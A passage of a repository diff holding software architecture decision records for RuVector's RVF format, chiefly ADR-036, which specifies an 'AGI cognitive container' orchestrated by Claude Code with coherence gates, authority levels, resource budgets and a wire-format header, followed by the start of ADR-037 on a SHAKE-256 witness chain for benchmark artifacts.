| policy_violations | == 0 | Zero unsafe actions |
| evidence_coverage | == 1.00 | Every solve has witness bundle |
| rollback_correctness | == 1.00 | All rollbacks restore clean state|
## 5. Deterministic Replay
A witness bundle contains everything needed to verify a task execution:
1. **Spec**: What was asked
2. **Plan**: What was decided
3. **Trace**: What tools were called (with hashed args/results)
4. **Diff**: What changed
5. **Test log**: What was verified
6. **Signature**: Tamper proof
Replay flow:
1. Parse bundle, verify signature
2. Display spec and plan
3. Walk trace entries, showing each tool call
4. Display diff
5. Display test log
6. Verify outcome matches test log
## 6. Cost-to-Outcome Curve
Track over time (nightly runs):
| Week | Tasks | Solved | Cost/Solve | Tokens/Solve | Retries | Regressions |
|------|-------|--------|------------|--------------|---------|-------------|
| 1 | 100 | 60 | $0.015 | 8,000 | 12 | 0 |
| 2 | 100 | 64 | $0.013 | 7,500 | 10 | 1 |
| ... | ... | ... | ... | ... | ... | ... |
A stable downward slope on cost/solve with flat or rising success rate
is the compounding story.
## Implementation
| File | Purpose | Tests |
|-----------------------------------------------|-------------------------|-------|
| `crates/rvf/rvf-types/src/witness.rs` | Wire-format types | 10 |
| `crates/rvf/rvf-runtime/src/witness.rs` | Builder, parser, score | 14 |
| `crates/rvf/rvf-runtime/tests/witness_e2e.rs` | E2E integration | 11 |
All tests use real HMAC-SHA256 signatures. Zero external dependencies.
## References
- ADR-034: QR Cognitive Seed (SHA-256, HMAC-SHA256 primitives)
- FIPS 180-4: Secure Hash Standard (SHA-256)
- RFC 2104: HMAC (keyed hashing)
- RFC 4231: HMAC-SHA256 test vectors

View File

@@ -0,0 +1,748 @@
# ADR-036: RuVector AGI Cognitive Container with Claude Code Orchestration
**Status**: Partially Implemented
**Date**: 2026-02-15 (updated 2026-02-17)
**Decision owners**: RuVector platform team, Claude Flow orchestration team, RVF runtime team
**Depends on**: ADR-029 (RVF Canonical Format), ADR-030 (Cognitive Container), ADR-033 (Progressive Indexing Hardening), ADR-034 (QR Cognitive Seed), ADR-035 (Capability Report), ADR-039 (RVF Solver WASM AGI Integration)
**Affects**: `rvf-types/src/agi_container.rs`, `rvf-runtime`, `npm/packages/rvf-solver/`, `npm/packages/rvf/`
## Context
A state change into general intelligence can emerge when two conditions hold:
1. **Existential facilities** -- a substrate that can persist identity, memory,
constraints, health signals, and self-maintenance.
2. **Architectural organization** -- a framework that can package the system,
control execution, and enforce repeatability while enabling incremental
self-reinforced feedback loops.
RuVector is the existential substrate. RVF is the organizational and packaging
framework. Claude Code is the runtime orchestrator for planning and execution,
using agent teams and tool connectivity via MCP.
The deliverable is a portable intelligence package that other teams can run and
obtain the same graded outcomes, with replayable witness logs, policy controls,
and deterministic environment capture.
## Problem Statement
We need an architecture that can do all of the following in one system:
1. Learn continuously from real-world event streams
2. Maintain its own structural health and recover from corruption or drift
3. Act through tools with governed authority
4. Produce repeatable outcomes across machines and teams
5. Package the full intelligence state so it can be shipped, audited, and replayed
Most LLM-centered architectures measure success by static accuracy, but this
thesis needs longitudinal coherence under mutation. This ADR defines that
system boundary explicitly.
## Decision Drivers
1. Repeatable outcomes, not just plausible responses
2. Long-horizon coherence under continuous updates
3. Governance by default, including proof trails for actions
4. Minimal reliance on hidden model internals for learning
5. Portability across environments, including edge and offline modes
6. Strong separation of control plane and data plane
7. Tool-use reliability, batching, and reduced context pollution
Claude Code is chosen as orchestrator because it is designed to read codebases,
edit files, run commands, manage workflows, and integrate with external systems
via MCP, including multi-agent teams coordinated by a lead.
Programmatic tool calling is used as the preferred high-reliability tool
orchestration strategy because it makes control flow explicit in code and
reduces repeated model round-trips and context bloat.
## Definitions
| Term | Definition |
|------|-----------|
| **RuVector substrate** | Persistent world model combining vectors, graphs, constraints, and signals. Supports graph querying via Cypher. Includes self-learning and graph neural embedding updates, with dynamic minimum-cut as a coherence signal. |
| **RVF framework** | Cognitive container format that packages data, indexes, models, policies, and runtime into a single artifact. A single file that stores vectors and models, boots as a Linux microservice, accelerates queries using eBPF, branches at cluster granularity, and provides cryptographic witness chains. |
| **Claude Code orchestrator** | Agentic coding and task execution environment that runs in terminal, IDE, desktop, and web. Connects external tools via MCP. Coordinates agent teams. |
| **Claude Flow** | Multi-agent orchestration layer that turns Claude Code into a swarm-style coordinator with router, agents, shared memory, and learning loop. |
| **Structural health** | Measurable invariants indicating world model integrity: coherence gates, contradiction tracking, memory integrity, policy compliance, rollback readiness. |
| **Witness chain** | Cryptographic attestation trail linking each state change to inputs, decisions, and tool outputs. See ADR-035. |
| **Same results** | Identical graded outcomes and artifacts for a benchmark run, not necessarily identical intermediate tokens. Enforced through replay mode and verification mode. |
## Considered Options
| # | Option | Verdict |
|---|--------|---------|
| 1 | LLM-only agent with prompt history and ad-hoc logs | Rejected: no structural health, no reversibility, no packaging |
| 2 | LLM + vector retrieval memory only | Rejected: no coherence gating, no witness chains, no portable replay |
| 3 | LLM + RuVector world model + RVF cognitive container, orchestrated by Claude Code and Claude Flow | **Selected** |
**Rationale**: Options 1 and 2 cannot meet the thesis because they lack explicit
structural health machinery, reversible state transitions, and portable
replayable intelligence packaging.
## Decision
Build the AGI system as a closed-loop cognitive container:
1. **Claude Code** is the control plane orchestrator. It spawns an agent team
and coordinates planning and execution.
2. **Claude Flow** provides the swarm orchestration model, routing tasks to
specialized agents and managing shared memory and learning loop semantics.
3. **RuVector** is the existential substrate, storing world model state, typed
memory, constraints, and coherence signals, queryable via graph queries
and vector search.
4. **RVF** is the portable intelligence package format. It encapsulates the
agent runtime, RuVector state snapshot and deltas, policies, indexes, tool
adapters, and the evaluation harness so others can reproduce the same
graded results.
5. **Learning** occurs primarily by structured memory mutation and skill
promotion governed by coherence and evaluation gates, not by continuous
weight updates.
## Architecture Overview
### System Boundary
**Inside the boundary:**
1. Claude Code lead session
2. Claude Flow router and swarm manager
3. Tool adapters and execution sandbox
4. RuVector database cluster (or embedded instance)
5. RVF container runtime and witness chain engine (ADR-035)
6. Evaluation harness and graders
**Outside the boundary:**
1. External data sources (repos, ticketing, logs, sensors)
2. External model provider infrastructure
3. Human approvals (if policy requires)
### High-Level Data Flow
```
Event Ingestion ──> World Model Update Proposal
│ │
│ Structural Health Gate
│ │
│ ┌───────┴───────┐
│ │ Gate PASS? │
│ │ yes no │
│ │ │ │ │
│ │ Commit Reject│
│ │ │ │ │
│ └───┴─────┘ │
│ │ │
▼ ▼ ▼
Plan & Act Loop Reflection Rollback &
(Claude Code + & Compress Quarantine
Claude Flow) │
│ │
▼ ▼
Commit & Witness (RVF ADR-035)
```
1. **Event ingestion**: Real-world events arrive and are normalized into a
canonical event schema.
2. **World model update proposal**: The system proposes graph mutations and
memory writes in RuVector.
3. **Structural health gating**: Coherence checks, contradiction checks, and
policy checks determine if the proposal can be committed.
4. **Plan and act loop**: Claude Code and Claude Flow coordinate tool calls to
act in the environment, using programmatic tool calling patterns.
5. **Reflection and compression**: Results are summarized into stable facts,
procedures, and counterexamples.
6. **Commit and witness**: Deltas are committed into RuVector and sealed into
the RVF witness chain (ADR-035).
### Control Plane / Data Plane Separation
| Aspect | Control Plane | Data Plane |
|--------|--------------|------------|
| **Who** | Claude Code + Claude Flow | RuVector + RVF |
| **Does** | Decides what to do; generates proposed deltas and tool actions | Executes storage, retrieval, graph ops, embeddings, coherence |
| **Varies** | Internal reasoning may vary between runs | Only gated commits become reality |
| **Enforces** | Plans and policies | Packaging, execution boundaries, attestations |
This separation is the core of repeatability.
## Components and Responsibilities
### Component A: Claude Code Lead Agent
| Inputs | Outputs |
|--------|---------|
| Task description | Plans |
| Current RVF container identity and policy | Tool calls |
| RuVector retrieval results | Proposed memory mutations |
| Tool outputs and environment observations | Commit requests |
Key capabilities: agent teams for parallel decomposition, MCP tool connectivity,
project instruction loading for consistent behavior across runs.
### Component B: Claude Flow Swarm Manager
| Inputs | Outputs |
|--------|---------|
| Lead agent goal graph | Sub-agent tasks |
| System policy limits | Consensus proposals |
| RuVector shared memory state | Aggregated plan; learning loop updates |
Architecture: router-to-swarm-to-agents with learning loop and shared memory.
### Component C: RuVector Substrate
| Inputs | Outputs |
|--------|---------|
| Events, text, code, images, structured records | Retrieved memories and facts |
| Embeddings, graph mutation deltas | Graph query results (Cypher) |
| Health telemetry updates | Embedding/ranking updates (self-learning) |
| | Coherence signals (dynamic minimum-cut) |
### Component D: RVF Cognitive Container Runtime
| Inputs | Outputs |
|--------|---------|
| Container manifest | Bootable runtime environment |
| Segmented data blobs | Reproducible execution environment |
| Policy and permissions | Signed witness records (ADR-035) |
| Cryptographic keys | Branchable snapshots |
### Component E: Tool Execution Sandbox
| Inputs | Outputs |
|--------|---------|
| Tool call plans from Claude Code | Tool results as structured objects |
| Programmatic tool calling scripts | Tool receipts with hashes |
| Policy rules | Failure modes and retry classifications |
## RuVector World Model Schema
### Node Types
| # | Type | Purpose |
|---|------|---------|
| 1 | **AgentIdentity** | Stable identity, keys, role, authority limits |
| 2 | **Event** | Normalized external observation (timestamp, source, payload hash) |
| 3 | **Claim** | Statement that may be true or false, linked to evidence |
| 4 | **Evidence** | Pointer to tool output, document excerpt, test output, sensor observation |
| 5 | **Plan** | Goal tree, constraints, success criteria, expected cost |
| 6 | **Action** | Tool invocation request with preconditions and expected effect |
| 7 | **Outcome** | Observed effects, pass/fail, test results, diffs, side effects |
| 8 | **Skill** | Reusable procedure with applicability conditions, constraints, and tests |
| 9 | **Policy** | Rules for permissions and safety boundaries |
| 10 | **HealthSignal** | Coherence metrics, drift, contradiction density, memory integrity |
### Edge Types
| Edge | Semantics |
|------|----------|
| `CAUSED` | Event CAUSED Claim or Outcome |
| `SUPPORTS` | Evidence SUPPORTS Claim |
| `CONTRADICTS` | Claim CONTRADICTS Claim |
| `DEPENDS_ON` | Plan DEPENDS_ON Skill or Evidence |
| `EXECUTES` | Action EXECUTES Tool |
| `PRODUCED` | Action PRODUCED Outcome |
| `PROMOTED_FROM` | Skill PROMOTED_FROM repeated successful Plans |
| `BLOCKED_BY` | Action BLOCKED_BY Policy |
| `HEALTH_OF` | HealthSignal HEALTH_OF subsystem or memory region |
### Invariants
| # | Invariant | Rule |
|---|-----------|------|
| 1 | **Evidence binding** | Any externally testable claim must have at least one Evidence edge; otherwise tagged `unverified` and cannot justify irreversible actions |
| 2 | **Contradiction locality** | A contradiction edge must reference the minimal conflicting claims, not a broad document blob |
| 3 | **Action gating** | Any action that changes external state must reference the policy decision node that allowed it |
| 4 | **Replay completeness** | Every tool output referenced by evidence must be hashable and stored or re-derivable from deterministic inputs |
## Structural Health and Coherence Gate Design
This is the mechanism that operationalizes the state-change thesis. It turns
continuous learning into safe incremental commits.
### Health Signals
| # | Signal | Computation |
|---|--------|-------------|
| 1 | **Coherence score** | Dynamic minimum-cut on active working set subgraph. Measures separability between consistent clusters and contradiction boundaries. |
| 2 | **Contradiction pressure** | Rate of new contradiction edges per unit time, weighted by claim criticality |
| 3 | **Memory integrity** | Schema validation success, witness chain continuity, segment hash integrity |
| 4 | **Tool reliability** | Error rates, retries, timeouts, drift in tool schemas |
| 5 | **Cost stability** | Cost-per-solved-task trend, abnormal spikes |
### Coherence Gate Rules
| Rule | Trigger | Action |
|------|---------|--------|
| 1. Block unsafe commits | Coherence score drops below threshold after proposed delta | Reject and open repair plan |
| 2. Require counterexample storage | An outcome fails | Counterexample must be created and linked before any new skill promotion |
| 3. Limit graph churn | Contradiction pressure exceeds threshold | Freeze new skill promotion; focus on repair and consolidation |
| 4. Quarantine volatile memories | New claims arrive | Enter volatile pool until reinforced by independent evidence or repeated success |
## Learning Loop Design
### Learning Primitives
1. **Episodic capture**: Store event, plan, action, outcome chain as an episode
2. **Reflection**: Extract stable claims and failure causes, bind evidence
3. **Consolidation**: Merge redundant claims, compress long traces into summaries
plus pointers, maintain witness chain
4. **Skill promotion**: Promote procedure into Skill node only when criteria met
### Skill Promotion Criteria
A candidate becomes a skill when **all** of the following are true:
1. It has succeeded K times on non-identical inputs
2. It has at least one negative example recorded and bounded
3. It has objective graders that validate outputs
4. It does not increase policy violations or coherence degradation
### Self-Reinforced Feedback Loops
A loop is self-reinforced when successful actions increase the system's future
probability of selecting high-value plans, while structural health remains
within bounds.
**Mechanism:**
- Success produces evidence and updated skill priors
- RuVector retrieval makes these skills easier to select
- Coherence gates prevent runaway self-confirmation
## Repeatability and Portable Intelligence Packaging
### RVF Packaging Decision
One RVF artifact contains:
| Segment | Contents |
|---------|----------|
| **Manifest and identity** | Container ID, build ID, model routing config, policy version, tool adapter registry |
| **Runtime** | Claude Flow orchestrator config, agent role prompts, tool schemas, sandbox config |
| **RuVector snapshot** | Base world model graph, indexes, embeddings, skill library, policy nodes |
| **Delta journal** | Append-only commits with witness chain records (ADR-035) |
| **Evaluation harness** | Task suite, graders, scoring rules, replay scripts |
### Two Execution Modes
| Mode | Goal | Method | Pass Condition |
|------|------|--------|----------------|
| **Replay** | Bit-identical artifact reproduction | No external tool calls; use stored receipts and outputs | All graders match exactly; witness chain matches |
| **Verify** | Same graded outcomes under live tools | Tools called live; outputs stored and hashed | Outputs pass same tests; costs within expected bounds |
This is how you claim "same results" without over-promising identical token
sequences across different infrastructure.
### Determinism Controls
1. Pin model ID to a specific version in the container manifest
2. Set sampling for maximum determinism in production runs
3. Store prompt and instruction hashes for each run
4. Virtualize time for tasks that depend on timestamps
5. Freeze external dependencies by snapshotting repos and data sources
6. Record all tool outputs with hashes and schema versions
## AGI npm Package Distribution
The AGI capabilities of the cognitive container are distributed as npm packages,
enabling JavaScript/TypeScript consumers to access the self-learning engine,
witness chains, and HNSW index operations without a Rust toolchain.
### Package Ecosystem
| Package | Version | AGI Capabilities |
|---------|---------|-----------------|
| `@ruvector/rvf-solver` | 0.1.0 | Thompson Sampling PolicyKernel, KnowledgeCompiler, three-loop adaptive solver, SHAKE-256 witness chains, 18 context buckets, speculative dual-path execution |
| `@ruvector/rvf-node` | 0.1.6 | HNSW index statistics, witness chain verification, store freeze (snapshot), distance metric introspection |
| `@ruvector/rvf-wasm` | 0.1.5 | Witness chain verification (`rvf_witness_verify`), WASM microkernel for browser/edge |
| `@ruvector/rvf` | 0.1.8 | Unified SDK re-exporting all of the above; single `npm install` for full AGI access |
### Self-Learning Solver API
```typescript
import { RvfSolver } from '@ruvector/rvf';
const solver = await RvfSolver.create();
// Three-loop training: fast (solve) / medium (policy) / slow (compiler)
const result = solver.train({ count: 1000, minDifficulty: 1, maxDifficulty: 10 });
// Full acceptance test with A/B/C ablation modes
const manifest = solver.acceptance({ cycles: 5, holdoutSize: 100 });
// Inspect learned policy state
const policy = solver.policy();
// Export tamper-evident witness chain (73 bytes per entry)
const chain = solver.witnessChain();
solver.destroy();
```
### AGI NAPI Methods
The native Node.js bindings expose AGI-relevant operations:
| Method | Returns | AGI Purpose |
|--------|---------|-------------|
| `indexStats()` | `RvfIndexStats` | Introspect HNSW graph structure (layers, M, ef_construction) for coherence monitoring |
| `verifyWitness()` | `RvfWitnessResult` | Validate witness chain integrity for replay/verify modes |
| `freeze()` | `void` | Snapshot-freeze state for deterministic branching |
| `metric()` | `string` | Distance metric introspection for coherence signal computation |
### Integration with Cognitive Container
The npm packages map to cognitive container components:
| Container Component | npm Package | Segment |
|--------------------|-------------|---------|
| Self-learning engine | `@ruvector/rvf-solver` | SOLVER_SEG (computed in WASM) |
| Witness chain attestation | `@ruvector/rvf-solver` + `@ruvector/rvf-wasm` | WITNESS_SEG (0x0A) |
| Vector storage & retrieval | `@ruvector/rvf-node` | VEC_SEG, INDEX_SEG |
| HNSW index inspection | `@ruvector/rvf-node` | INDEX_SEG |
| Browser-side verification | `@ruvector/rvf-wasm` | WITNESS_SEG verification |
## MCP Tools
Core MCP tools to implement:
| Tool | Purpose |
|------|---------|
| `ruvector_query` | Vector search and filtered retrieval |
| `ruvector_cypher` | Graph query and traversal for claims, evidence, contradictions |
| `ruvector_commit_delta` | Propose and commit world model deltas behind coherence gates |
| `rvf_snapshot` | Create a branchable snapshot for experiments |
| `rvf_witness_export` | Export witness chain proofs for audit (ADR-035) |
| `rvf_solver_train` | Run self-learning solver training via `@ruvector/rvf-solver` |
| `rvf_solver_acceptance` | Execute full A/B/C ablation acceptance test |
| `eval_run` | Run the container's benchmark suite and return graded results |
## Security Model
### Threat Model
1. Prompt injection via untrusted content
2. Tool abuse and unintended side effects
3. Data exfiltration via tool channels
4. Memory poisoning causing long-horizon drift
5. Supply chain drift causing irreproducible results
### Controls
| # | Control | Mechanism |
|---|---------|-----------|
| 1 | Capability-based permissions | Each tool call requires explicit capability grants; high-risk actions require approvals |
| 2 | Policy as data | Policies live in RuVector and are embedded in RVF manifest; policy cannot silently change between runs |
| 3 | Witnessed commits | Every commit is attested with inputs, policy decision, and tool receipts (ADR-035) |
| 4 | Quarantine zone | Untrusted inputs enter quarantine; cannot directly affect skill promotion |
| 5 | Sandboxed execution | Tool scripts run in restricted environments; programmatic tool calling makes control flow explicit |
## Observability and Benchmarking
### Required Metrics
1. Success rate on task suite
2. Policy violations count
3. External side effects count
4. Contradiction rate
5. Coherence score trend
6. Rollback frequency and success
7. Dollars per solved task
8. p50 and p95 latency per task
9. Tool error rate
### Benchmark Tiers
| Tier | Name | Purpose |
|------|------|---------|
| 1 | Deterministic replay suite | Verifies packaging and witness integrity |
| 2 | Tool and memory suite | Measures long-horizon stability and coherence gating |
| 3 | Production domain suite | Measures real outcomes (repo issue fixes, compliance, deployments) |
### Proof Artifact per Run
Each run exports:
1. Run manifest
2. Task inputs and snapshots
3. All tool receipts and hashes
4. All committed deltas
5. Witness chain export (ADR-035)
6. Grader outputs and final scorecard
## Consequences
### Positive
1. **Clear system boundary** for intelligence measurement -- the composite
system is evaluated, not the model in isolation
2. **Repeatability as a product feature** -- RVF container + witness chain +
replay mode enables credible external validation
3. **Safety is structural** -- policies and coherence gates are part of the
substrate, not an afterthought
4. **Multi-agent scalability** -- Claude Code agent teams + Claude Flow swarm
routing supports parallel work and specialization
### Negative / Risks
1. **Complexity risk** -- system of systems; requires investment in harnesses
and invariants early
2. **Non-determinism risk** from model providers -- replay mode mitigates by
recording outputs
3. **Memory poisoning risk** -- powerful memory can amplify wrong beliefs if
coherence gates are weak; bias toward evidence binding and counterexample capture
4. **Benchmark gaming risk** -- weak graders will be exploited; build robust
graders first
## Implementation Plan
### Phase 1: Foundation
**Deliverables:**
1. RuVector schema and APIs for events, claims, evidence, contradictions
2. RVF container manifest format for model, policy, tool registry, snapshots
3. MCP server exposing RuVector and RVF operations to Claude Code
4. Basic witness log and delta commit pipeline (ADR-035 -- done)
**Exit criteria:** Replay mode works on a small deterministic suite.
### Phase 2: Coherence Gating
**Deliverables:**
1. Structural health signals and thresholds
2. Dynamic minimum-cut coherence metric integration
3. Rollback and quarantine semantics
4. Contradiction detection routines
**Exit criteria:** No irreversible external tool calls allowed when coherence is
below threshold.
### Phase 3: Learning and Skill Promotion
**Deliverables:**
1. Skill nodes, promotion criteria, and tests
2. Consolidation and compaction routines
3. Counterexample-driven repair
**Exit criteria:** Skills improve success rate over time without increasing
contradictions.
### Phase 4: Portable Intelligence Distribution
**Deliverables:**
1. One-RVF-file distribution pipeline
2. Public evaluation harness packaged inside RVF
3. Verification mode that produces same graded outcomes across machines
**Exit criteria:** Two independent teams run the same RVF artifact and achieve
the same benchmark scorecard.
## Resolved Design Questions
### Q1: First domain for proving the state-change thesis
**Decision: Repo automation** (software engineering lifecycle).
Rationale: This domain provides the strongest combination of (a) verifiable
outcomes (tests pass, code compiles, PR merges), (b) tool-rich environment
(git, CI, code editors via Claude Code), (c) naturally occurring event streams
(issues, commits, reviews), and (d) existing infrastructure in Claude Code +
Claude Flow. The evaluation harness measures: issues solved, test success rate,
regression introduction rate, cost per solved issue, and witness chain
completeness.
Subsequent domains (incident triage, governance workflows, edge autonomy)
are pursued after the repo automation scorecard achieves >= 60/100 solved
with zero policy violations.
### Q2: Authority levels
**Decision: Four-level authority model, default ReadMemory.**
```rust
#[repr(u8)]
pub enum AuthorityLevel {
/// Read-only: query vectors, graphs, memories. No mutations.
ReadOnly = 0,
/// Write to internal memory: commit world model deltas behind
/// coherence gates. No external tool calls.
WriteMemory = 1,
/// Execute tools: run sandboxed tools (file read/write, tests,
/// code generation). External side effects are gated by policy.
ExecuteTools = 2,
/// Write external: push code, create PRs, send messages, modify
/// infrastructure. Requires explicit policy grant per action class.
WriteExternal = 3,
}
```
Each action in the world model must reference a policy decision node
(invariant #3, "Action gating") that grants at least the required authority
level. The container manifest declares the maximum authority level permitted
for a given execution. Higher levels require explicit policy override.
Default for Replay mode: `ReadOnly`.
Default for Verify mode: `ExecuteTools`.
Default for Live mode: `WriteMemory` (escalation to higher levels requires
policy grant per action class).
### Q3: Resource budgets
**Decision: Per-task resource budgets with hard caps.**
Every task execution is bounded by:
| Resource | Default Cap | Override |
|----------|-------------|---------|
| Wall-clock time per task | 300 seconds | Policy override, max 3600s |
| Total model tokens per task | 200,000 | Policy override, max 1,000,000 |
| Total cost per task | $1.00 | Policy override, max $10.00 |
| Tool calls per task | 50 | Policy override, max 500 |
| External write actions per task | 0 (ReadOnly) | Requires WriteExternal authority |
Budget exhaustion triggers graceful degradation: the task enters `Skipped`
outcome with a `BudgetExhausted` postmortem in the witness bundle.
### Q4: Coherence thresholds
**Decision: Three configurable thresholds stored in the container header.**
| Threshold | Default | Effect when breached |
|-----------|---------|---------------------|
| `min_coherence_score` | 0.70 | Block all commits; enter repair mode |
| `max_contradiction_rate` | 5.0 per 100 events | Freeze skill promotion |
| `max_rollback_ratio` | 0.20 | Halt Live execution; require human review |
These map to ADR-033's quality framework: the coherence score is analogous
to `ResponseQuality` -- it signals whether the system's internal state is
trustworthy enough to act on.
## Wire Format
### AgiContainerHeader (64 bytes, `repr(C)`)
The AGI container is stored as a `Meta` segment (`SegmentType::Meta = 0x07`)
in the RVF file, alongside the KERNEL_SEG, WASM_SEG, VEC_SEG, INDEX_SEG,
WITNESS_SEG, and CRYPTO_SEG that hold the actual payload data.
```
Offset Type Field Description
------ ---- ----- -----------
0x00 u32 magic 0x52564147 ("RVAG")
0x04 u16 version Header format version (currently 1)
0x06 u16 flags Bitfield (see below)
0x08 [u8; 16] container_id Unique container UUID
0x18 [u8; 16] build_id Build UUID (changes on repackaging)
0x28 u64 created_ns Creation timestamp (nanos since epoch)
0x30 [u8; 8] model_id_hash SHA-256 of pinned model ID, truncated
0x38 [u8; 8] policy_hash SHA-256 of governance policy, truncated
```
### Flags (u16 bitfield)
```
Bit Name Description
--- ---- -----------
0 AGI_HAS_KERNEL KERNEL_SEG with micro Linux kernel present
1 AGI_HAS_WASM WASM_SEG modules present
2 AGI_HAS_ORCHESTRATOR Claude Code + Claude Flow config present
3 AGI_HAS_WORLD_MODEL VEC_SEG + INDEX_SEG world model data present
4 AGI_HAS_EVAL Evaluation harness (tasks + graders) present
5 AGI_HAS_SKILLS Promoted skill library present
6 AGI_HAS_WITNESS ADR-035 witness chain present
7 AGI_SIGNED Container is cryptographically signed
8 AGI_REPLAY_CAPABLE All tool outputs stored; supports replay mode
9 AGI_OFFLINE_CAPABLE Container can run without network access
10 AGI_HAS_TOOLS MCP tool adapter registry present
11 AGI_HAS_COHERENCE_GATES Coherence gate configuration present
```
### TLV Manifest Tags
Following the header, a TLV (tag-length-value) manifest contains the
container's configuration sections:
| Tag | Name | Content |
|--------|------------------------|---------|
| 0x0100 | CONTAINER_ID | Container UUID |
| 0x0101 | BUILD_ID | Build UUID |
| 0x0102 | MODEL_ID | Pinned model identifier (UTF-8) |
| 0x0103 | POLICY | Serialized governance policy |
| 0x0104 | ORCHESTRATOR | Claude Code + Claude Flow config |
| 0x0105 | TOOL_REGISTRY | MCP tool adapter registry |
| 0x0106 | AGENT_PROMPTS | Agent role prompts |
| 0x0107 | EVAL_TASKS | Evaluation task suite |
| 0x0108 | EVAL_GRADERS | Grading rules |
| 0x0109 | SKILL_LIBRARY | Promoted skill library |
| 0x010A | REPLAY_SCRIPT | Replay automation script |
| 0x010B | KERNEL_CONFIG | Kernel boot parameters |
| 0x010C | NETWORK_CONFIG | Network configuration |
| 0x010D | COHERENCE_CONFIG | Coherence gate thresholds and rules |
| 0x010E | PROJECT_INSTRUCTIONS | Claude.md project instructions |
| 0x010F | DEPENDENCY_SNAPSHOT | Dependency snapshot hashes |
| 0x0110 | AUTHORITY_CONFIG | Authority level and resource budgets |
| 0x0111 | DOMAIN_PROFILE | Target domain profile (RVText, etc.) |
Unknown tags are ignored (forward-compatible).
### Implementation
Types are fully implemented in `rvf-types/src/agi_container.rs` (972 lines, 24 tests).
**Implemented types:**
| Type | Size / Kind | Description | Tests |
|------|-------------|-------------|-------|
| `AgiContainerHeader` | 64 bytes (`repr(C)`) | Wire-format header with magic "RVAG" (0x52564147), `to_bytes()`/`from_bytes()` serialization, compile-time size assertion | 4 |
| `ExecutionMode` | `u8` enum | Replay (0), Verify (1), Live (2) with `TryFrom<u8>` | 1 |
| `AuthorityLevel` | `u8` enum | ReadOnly (0), WriteMemory (1), ExecuteTools (2), WriteExternal (3) with `TryFrom<u8>`, `PartialOrd`/`Ord`, `permits()`, `default_for_mode()` | 4 |
| `ResourceBudget` | struct | Per-task resource caps with `DEFAULT`, `EXTENDED`, `MAX` presets and `clamped()` method | 3 |
| `CoherenceThresholds` | struct | Three configurable thresholds (`min_coherence_score`, `max_contradiction_rate`, `max_rollback_ratio`) with `DEFAULT`, `STRICT` presets and `validate()` method | 5 |
| `ContainerSegments` | struct | Segment presence tracker with `validate(mode)` and `to_flags()` | 7 |
| `ContainerError` | enum | 6 variants: MissingSegment, TooLarge, InvalidConfig, SignatureInvalid, InsufficientAuthority, BudgetExhausted with `Display` | 1 |
**Constants defined:**
- 13 flag constants (`AGI_HAS_KERNEL` through `AGI_HAS_DOMAIN_EXPANSION`, bits 0-12)
- 22 TLV manifest tag constants (`AGI_TAG_CONTAINER_ID` 0x0100 through `AGI_TAG_COUNTEREXAMPLES` 0x0115)
- Includes 4 domain expansion tags: `AGI_TAG_TRANSFER_PRIOR` (0x0112), `AGI_TAG_POLICY_KERNEL` (0x0113), `AGI_TAG_COST_CURVE` (0x0114), `AGI_TAG_COUNTEREXAMPLES` (0x0115)
**Key design properties:**
- `AuthorityLevel::permits()` enables level comparison: `WriteExternal` permits all lower levels
- `AuthorityLevel::default_for_mode()` maps Replay->ReadOnly, Verify->ExecuteTools, Live->WriteMemory
- `ResourceBudget::clamped()` enforces hard ceilings (`MAX` preset) that cannot be overridden
- `CoherenceThresholds::validate()` rejects out-of-range values
- `ContainerSegments::validate(mode)` enforces mode-specific segment requirements
- `ContainerSegments::to_flags()` computes the bitfield from present segments
- All types are `no_std` compatible and exported from `rvf-types/src/lib.rs`
## Acceptance Test
Run the same RVF artifact on two separate machines owned by two separate teams.
**Suite:** 100 tasks (30 requiring tool use, 70 internal reasoning/memory)
**Pass criteria:**
1. Replay mode produces identical grader outputs for all 100 tasks
2. Verify mode produces at least 95/100 passing on both machines
3. Zero policy violations
4. Every externally checkable claim has evidence pointers
5. Witness chain verifies end-to-end
## References
- ADR-029: RVF Canonical Format (segment model, wire format, manifest)
- ADR-030: Cognitive Container (KERNEL_SEG, EBPF_SEG, three-tier execution)
- ADR-031: RVCOW Branching (COW branching, KernelBinding)
- ADR-033: Progressive Indexing Hardening (quality framework, coherence gates, safety budgets)
- ADR-034: QR Cognitive Seed (portable bootstrap, zero-dep crypto)
- ADR-035: Capability Report (witness bundles, scorecards, governance)
- RVF format specification (rvf-types, rvf-runtime, rvf-manifest)
- RFC 8032: Ed25519
- FIPS 180-4: SHA-256
- Dynamic minimum-cut (arXiv preprint referenced in RuVector mincut crate)
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-02-15 | ruv.io | Initial proposal |
| 1.1 | 2026-02-15 | architecture review | Resolved open questions (domain, authority, resource budgets, coherence thresholds). Added wire format section. Added cross-references to ADR-029/030/031/033. Added AuthorityLevel enum and resource budget types. Tightened ContainerSegments validation. |
| 1.2 | 2026-02-16 | implementation review | Status updated to Partially Implemented. Documented full wire-format implementation in rvf-types/src/agi_container.rs (972 lines, 24 tests). All header types, enums, constants, and validators are implemented and exported. Domain expansion TLV tags (0x0112-0x0115) integrated. |

View File

@@ -0,0 +1,133 @@
# ADR-037: Publishable RVF Acceptance Test
| Field | Value |
|-------|-------|
| **Status** | Accepted |
| **Date** | 2026-02-16 |
| **Deciders** | RuVector core team |
| **Supersedes** | — |
| **Related** | ADR-029 (RVF canonical format), ADR-032 (RVF WASM integration), ADR-039 (RVF Solver WASM AGI integration) |
## Context
Temporal reasoning benchmarks produce results that are difficult for external developers to verify independently. Traditional benchmark reports rely on trust: the publisher runs the tests and shares aggregate metrics, but there is no mechanism for a third party to prove that the exact same computations produced those results. This gap matters for publishable research artifacts and for building confidence in the ablation study methodology.
The RVF format already provides a cryptographic witness chain infrastructure (WITNESS_SEG 0x0A) using SHAKE-256 hash linking, but this capability had not been applied to acceptance testing.
## Decision
We integrate the publishable acceptance test directly with the native RVF crate infrastructure to produce a self-contained, offline-verifiable artifact:
### 1. SHAKE-256 witness chain (rvf-crypto native)
The acceptance test replaces the standalone SHA-256 chain with `rvf_crypto::shake256_256` for all hash computations. Every puzzle decision (skip mode, context bucket, solve outcome, step count) is hashed into a SHAKE-256 chain where `chain_hash[i] = SHAKE-256(prev_hash || canonical_bytes(record))`. The chain is deterministic: frozen seeds produce identical puzzles, identical solve paths, and identical root hashes.
The parallel `rvf_crypto::WitnessEntry` list (73 bytes each: `prev_hash[32] + action_hash[32] + timestamp_ns[8] + witness_type[1]`) is built alongside the JSON chain, enabling native `.rvf` binary export.
### 2. Dual-format output (JSON + .rvf binary)
The `generate_manifest_with_rvf()` function produces both:
